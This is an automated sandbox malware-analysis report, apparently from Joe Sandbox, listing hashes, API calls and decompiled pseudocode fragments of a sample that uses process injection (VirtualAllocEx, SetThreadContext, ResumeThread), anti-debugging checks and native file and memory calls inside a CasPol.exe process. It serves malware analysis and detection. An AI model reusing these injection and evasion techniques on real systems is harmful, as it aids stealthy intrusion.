Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4ecf0014c2db08d7b5466ee004bfd5b9e9fdf24c60a845bac407abbfcfe2d4ef
Instruction ID: c363940c4a529ac0fed3c7cf43d567e5029d4e1b8c9e6beacf92ecb08975f7b0
Opcode Fuzzy Hash: 4ecf0014c2db08d7b5466ee004bfd5b9e9fdf24c60a845bac407abbfcfe2d4ef
Instruction Fuzzy Hash: 8D419CB9D042589FCF10CFAAD980ADEFBB5BB19310F14902AE814B7310C335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6B78 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DF6C25

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 30577dc9913fda00f487cc936886b5245457fa86e6e521afda1277ac4f5b0750
Instruction ID: 34e1d4e882cd28424988d4033921e6bb740d645c1bcc796316be986c3c51057f
Opcode Fuzzy Hash: 30577dc9913fda00f487cc936886b5245457fa86e6e521afda1277ac4f5b0750
Instruction Fuzzy Hash: 1F318AB9D002589FCF10CFAAD984ADEFBB5BB19314F14A02AE814B7310D375A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6C88 Relevance: 1.6, APIs: 1, Instructions: 98
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DF6D35

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b1b0b86938a44ebd1bfd07acb7e685b3e20bea791f655662115b5ad6ddf47811
Instruction ID: 5a130063b90f8c192a21accb7b495228e940c766e75acf72ae8da8dab8ca2341
Opcode Fuzzy Hash: b1b0b86938a44ebd1bfd07acb7e685b3e20bea791f655662115b5ad6ddf47811
Instruction Fuzzy Hash: ED3168B9D002589FCF10CFA9D980ADEFBB5BB19314F14941AE814B7310D335A956CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6C90 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DF6D35

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d78013669347ebbe4eb71cf619f29605c9fa7388512b64dc53702364ff669bc8
Instruction ID: 6dc63b5a2f48ddb8ad75a7c85397be994c837728dcab27672e8936c7ee0c0827
Opcode Fuzzy Hash: d78013669347ebbe4eb71cf619f29605c9fa7388512b64dc53702364ff669bc8
Instruction Fuzzy Hash: A53179B9D002589FCF10CFAAD980ADEFBB5BB19314F14A01AE814B7310D335A945CF69

Uniqueness

Uniqueness Score: -1.00%

Function 02DF4CD8 Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 02DF4D79

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: e8902aeb6e59dd39ad7281bb2560ddc369fc7a6780151c31089bbbcd9981f843
Instruction ID: 28465d4cc8f39c4517421b6d582282d3615399df71421e1c83042340bce37a79
Opcode Fuzzy Hash: e8902aeb6e59dd39ad7281bb2560ddc369fc7a6780151c31089bbbcd9981f843
Instruction Fuzzy Hash: 0231FDB5D002189FCB54CFA9D880AEEFBB2BF89314F10942AE505B7300C734A946CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6A68 Relevance: 1.6, APIs: 1, Instructions: 88
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 02DF6B12

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 4c57ff166b8d5f768f78fedc713c946bc4de5fdb61048c5b64928fc496103c7d
Instruction ID: 43e1b2df64c76e395e0562a46764dbf97503c98bb01dbe08ac4862a8ae9d9894
Opcode Fuzzy Hash: 4c57ff166b8d5f768f78fedc713c946bc4de5fdb61048c5b64928fc496103c7d
Instruction Fuzzy Hash: 8B3199B5D012589FCB10CFAAD984ADEFBF5BB49314F24902AE414B7310D378AA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6A63 Relevance: 1.6, APIs: 1, Instructions: 88
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadContext.KERNELBASE(?,?), ref: 02DF6B12

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: d33a03519c33ca13187e8239f499d1363b6fdc511f8c568b114ee09fb67add6c
Instruction ID: e092311ba4a5e57a1a033f49a42975cfc98457f6a90b5d5c6c206afd780242d4
Opcode Fuzzy Hash: d33a03519c33ca13187e8239f499d1363b6fdc511f8c568b114ee09fb67add6c
Instruction Fuzzy Hash: 98319AB5D012589FCB10CFAAD984ADEFBF5BB49314F24906AE414B7310C3789945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DF4CE0 Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(?,?), ref: 02DF4D79

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: bc74a4fc29d906d0780d169f5d6afb657bcf9e969f715d0508a32c429a63ee7a
Instruction ID: 24841051d661d9dab8367540fd5028792fdf71de5da188447477f3cb4e7566d9
Opcode Fuzzy Hash: bc74a4fc29d906d0780d169f5d6afb657bcf9e969f715d0508a32c429a63ee7a
Instruction Fuzzy Hash: 5231FCB5D012189FCB14CFA9D980AEEFBB6BF49314F14942AE405B7340CB34A942CF98

Uniqueness

Uniqueness Score: -1.00%

Function 02DF4909 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02DF499E

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 3351e742a0f5d033d581439216578f5b14f6d4eedabcfed77351bab8a8ea1b92
Instruction ID: 38e6dffbf85bd09a6b2938c15109abad87944027abd8f78a16c1f235aca77a18
Opcode Fuzzy Hash: 3351e742a0f5d033d581439216578f5b14f6d4eedabcfed77351bab8a8ea1b92
Instruction Fuzzy Hash: DD31C9B8E002189FCB10CFA9D880AAEFBF1BF49314F14842AE854B7300C735A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DF33CC Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 02DF4A8E

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ff392785cc456ea283dc58314991d6b33bf09e8845a05b56a264fd64856c1478
Instruction ID: aa41a36719149c66952093f37e5f32828ec83b268644fbef7e3d97c29008dd16
Opcode Fuzzy Hash: ff392785cc456ea283dc58314991d6b33bf09e8845a05b56a264fd64856c1478
Instruction Fuzzy Hash: 4331AAB8D042089FCB50CFA9D984ADEFBF4AB08314F14945AE915B7300D375A845CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 02DF4A09 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 02DF4A8E

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d338c2dfcef99ef0b60b336ee60de655def597ebdf64cca44e1ed0f5f307772b
Instruction ID: 68636c9ccaac20867ea25a9f68fcf23b7844fb21f1f566d7c6a88750c7d134ef
Opcode Fuzzy Hash: d338c2dfcef99ef0b60b336ee60de655def597ebdf64cca44e1ed0f5f307772b
Instruction Fuzzy Hash: AB31BBB9E042089FCB50CFA9D580ADEFBF0AF49314F14945AE915B7310D735A941CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6ED3 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 02DF6F4E

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 10d43afcd9a2e5581abf482e52949b852871f7cf6ca4852e5ff02dc98fa757a4
Instruction ID: 828239d30427ba1a8729c45616ae9dc5edb605754dedb2e906918c208f01ebfe
Opcode Fuzzy Hash: 10d43afcd9a2e5581abf482e52949b852871f7cf6ca4852e5ff02dc98fa757a4
Instruction Fuzzy Hash: C021AAB9D042189FCB10CFA9D584ADEFBF4AF49324F14905AE928B7310D375A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02DF6ED8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 02DF6F4E

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 60a4a8de73d53f606850214379c385c81a603bb1504b37920fa2897c913ae973
Instruction ID: 9690f6254ee1105714ef3c68f287c79d31f8410ced2daba47bd71fd6e915e8be
Opcode Fuzzy Hash: 60a4a8de73d53f606850214379c385c81a603bb1504b37920fa2897c913ae973
Instruction Fuzzy Hash: 5121BBB9D002089FCB10CFA9D584ADEFBF4AB09324F14905AE814B7300D375A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0157D01C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259413671.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af42e992c6805c723354cc47b7f57d0cca8682b0474075c5c39c28db84bcbe24
Instruction ID: 725e1f7a7a04ee3989327e8c50ece8ed6aa0d5d499490df289f5a04521db4eda
Opcode Fuzzy Hash: af42e992c6805c723354cc47b7f57d0cca8682b0474075c5c39c28db84bcbe24
Instruction Fuzzy Hash: 2A2131756042409FDB12DF68E9C4B2ABBB5FF84354F24CA6DE8494F242D33AD847C662

Uniqueness

Uniqueness Score: -1.00%

Function 0157D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259413671.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_157d000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89cdda64afc37e5c05c655def56b3b553e1dee6f3421ce13a3762aadf46491b9
Instruction ID: 2e230420fa7e2c0f747b542398427c489989edf486b31203af370ebda59657f4
Opcode Fuzzy Hash: 89cdda64afc37e5c05c655def56b3b553e1dee6f3421ce13a3762aadf46491b9
Instruction Fuzzy Hash: 20219F755093808FD703CF24D994B15BF71BF86214F28C6EAC8888F653D33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02DF470D Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12710840ad294bd0d21baa82dbe89fc9998ab573936e1c5d9a1df650bf890948
Instruction ID: 689f911103e18cc603187157e887ebc8e5894d8d0db33c8fa481a196bf1994ac
Opcode Fuzzy Hash: 12710840ad294bd0d21baa82dbe89fc9998ab573936e1c5d9a1df650bf890948
Instruction Fuzzy Hash: A651FDB4D002589FDB50CFA9D884BAEBBF2FF4A304F109529E615AB390DB749845CF94

Uniqueness

Uniqueness Score: -1.00%

Function 02DF4125 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d31d2d15a4f42c4741b2f6e440fac659ddce9e540341dfa3ed6ab89d0aa86c0e
Instruction ID: e2c1b7ef81ba00a0e2221d521c0e520b4ff8a3b7d9db43fdf0d8b88f3dce6ba7
Opcode Fuzzy Hash: d31d2d15a4f42c4741b2f6e440fac659ddce9e540341dfa3ed6ab89d0aa86c0e
Instruction Fuzzy Hash: 82510FB4E002589FDB54CFA9D884B9EBBF2BF49304F10912AE915BB390DB749845CF85

Uniqueness

Uniqueness Score: -1.00%

Function 02DF339C Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 931d6fece9c3ac41b152cd8d687c57795a8f06ed584cb832d9bf3bac68db0a28
Instruction ID: fef7638292f8c15242927f21a3b76eeedc6a4234724d17e8ed5c0b47614aed65
Opcode Fuzzy Hash: 931d6fece9c3ac41b152cd8d687c57795a8f06ed584cb832d9bf3bac68db0a28
Instruction Fuzzy Hash: 1D511FB4E002189FDB54CFA9D884B9EBBF2BF49304F108029E515BB390DB749885CF85

Uniqueness

Uniqueness Score: -1.00%

Function 02DF33C0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.259488977.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17a42748ec68775f13afb1b898da53074bdc5fc3938e64e5de3a10636406a57
Instruction ID: f616ca1dd36d461d6922c804cef303dbf464ece4d8659e4b8cbd00788bf13e83
Opcode Fuzzy Hash: f17a42748ec68775f13afb1b898da53074bdc5fc3938e64e5de3a10636406a57
Instruction Fuzzy Hash: 51510EB4D002589FDB50CFA9D884B9EBBF2BF49304F10952AE615BB390DB749845CF89

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 240, Parent PID: 908COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	4.6%
Total number of Nodes:	637
Total number of Limit Nodes:	77

Executed Functions

Function 0040CF93 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040CF93(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420ED3( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E004213F3(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00421673( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F773(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040cfaf
0x0040cfb2
0x0040cfb7
0x0040cfbc
0x0040cfc6
0x0040cfcb
0x0040cfce
0x0040cfd0
0x0040cfd8
0x0040cfdd
0x0040cfdd
0x0040cfe4
0x0040cfec
0x0040cfef
0x0040cff1
0x0040d005
0x00000000
0x0040d007
0x0040d00d
0x0040cfc1
0x0040cfc1
0x0040cfc1

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040D005

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
Instruction ID: bbe13f3015e6297afeaca4817b923598490fab2ca7d40facc20e4f3c260de4dd
Opcode Fuzzy Hash: 6f5b2f4712b73f0a6c183ab0c42c145bb9ecabd40e6db10e24392b7e9501096f
Instruction Fuzzy Hash: D50152B1E0020DB7DB10DBE1DC82F9EB3789B14308F0041A6E908A7280F675EB498755

Uniqueness

Uniqueness Score: -1.00%

Function 0041E58E Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E0041E58E(void* __edi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				asm("o16 sub [eax-0x1374aae0], dh");
				_t15 = _a4;
				_t3 = _t15 + 0xa6c; // 0xa6c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0041e58f
0x0041e596
0x0041e5a2
0x0041e5aa
0x0041e5e0
0x0041e5e4

APIs

NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
Instruction ID: 3e8d1509aa00af463a8d37bfd54f617173c4f7fb56af6955cf88f9c58c8e7bef
Opcode Fuzzy Hash: 0b2f63bc4df748dc29e0f4ed07ba210983120f05ced169b3209592cb89a30aa2
Instruction Fuzzy Hash: DC01CFB2205148AFCB48CF99DC88EEB37A9AF8C354F058248FA4D97241C630EC51CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E593 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041E593(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0041e5a2
0x0041e5aa
0x0041e5e0
0x0041e5e4

APIs

NtCreateFile.NTDLL(00000060,00000000,?,0041930F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041930F,?,00000000,00000060,00000000,00000000), ref: 0041E5E0

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
Instruction ID: 2b5a8fab2cb6a3536000231a5b839166af3a1201867cde8835e6817bdec1c646
Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
Instruction Fuzzy Hash: AAF0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E63D Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
Instruction ID: 0c08c0e38f336dbbf35a67dda85729340189d9c1c2ca355851ac7bf132b3d8ce
Opcode Fuzzy Hash: 28d66cf399481c95d32e110020bd23f1ef981db234855bc5189d8a5f907248b6
Instruction Fuzzy Hash: 06F0CFB2200108ABCB14DF99DC85EEB7BA9EF8C354F158249FA0DA7241C630E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E643 Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0041E643(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}

0x0041e652
0x0041e652
0x0041e65a
0x0041e688
0x0041e68c

APIs

NtReadFile.NTDLL(004194D3,0041499B,FFFFFFFF,00418FBD,00000002,?,004194D3,00000002,00418FBD,FFFFFFFF,0041499B,004194D3,00000002,00000000), ref: 0041E688

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
Instruction ID: aa4a829568f7423d39f4ec96ffd58af37ce6892a559b0f629fddbcd99df9d704
Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
Instruction Fuzzy Hash: BAF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BE0DA7241C630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E76D Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0041E76D(void* __edx, void* __fp0, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28, void* _a115) {
				intOrPtr _v117;
				long _t17;

				asm("out 0xd1, al");
				_v117 = _v117 + __edx;
				_t13 = _a4;
				_t5 = _t13 + 0x14; // 0x6ad04d03
				_t6 = _t13 + 0xa8c; // 0x404083
				E0041F203( *_t5, _a4, _t6,  *_t5, 0, 0x30);
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t17;
			}

0x0041e76d
0x0041e772
0x0041e776
0x0041e779
0x0041e782
0x0041e78a
0x0041e7ac
0x0041e7b0

APIs

NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
Instruction ID: 864ad69e3011cdc826fcdf3463504ce9b0c8951d6cc57d2b8f66622e5bcdf5d0
Opcode Fuzzy Hash: ee756809d0463d5cf1ffea27d1cfcbd02b1cf75dbeff1db517c4747886c75ae7
Instruction Fuzzy Hash: D3F034B2600208ABCB14DF98CC41EEB37ADAF88354F118119FE0997252C630E815CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041E773 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041E773(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t10 = _a4;
				_t2 = _t10 + 0x14; // 0x6ad04d03
				_t3 = _t10 + 0xa8c; // 0x404083
				E0041F203( *_t2, _a4, _t3,  *_t2, 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041e776
0x0041e779
0x0041e782
0x0041e78a
0x0041e7ac
0x0041e7b0

APIs

NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,004035F7,00000004,00001000,00000000), ref: 0041E7AC

Memory Dump Source

Source File: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
